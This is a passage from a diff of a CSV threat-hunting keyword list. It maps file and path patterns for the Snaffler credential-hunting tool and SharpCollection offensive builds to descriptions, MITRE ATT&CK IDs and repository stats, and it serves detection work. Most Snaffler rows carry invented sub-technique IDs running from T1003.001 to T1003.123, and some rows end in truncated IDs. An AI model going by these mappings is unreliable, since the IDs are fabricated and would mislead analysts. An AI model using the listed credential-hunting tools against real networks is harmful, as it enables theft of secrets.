fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*snaffler.exe*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - 
T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*snaffler.exe*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*snaffler.log*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*Snaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 
- T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*Snaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*SnafflerMessage.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a 
massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*SnafflerMessageType.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 
- T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCon/Snaffler*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - 
T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore.csproj*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation 
tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/ActiveDirectory*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation 
tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/Classifiers*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation 
tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/Concurrency*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation 
tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/Config*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation 
tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/ShareFind*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation 
tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/TreeWalk*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation 
tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*Snaffler.csproj*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*Snaffler.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*snaffler.exe*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - 
T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*snaffler.exe*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*snaffler.log*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - 
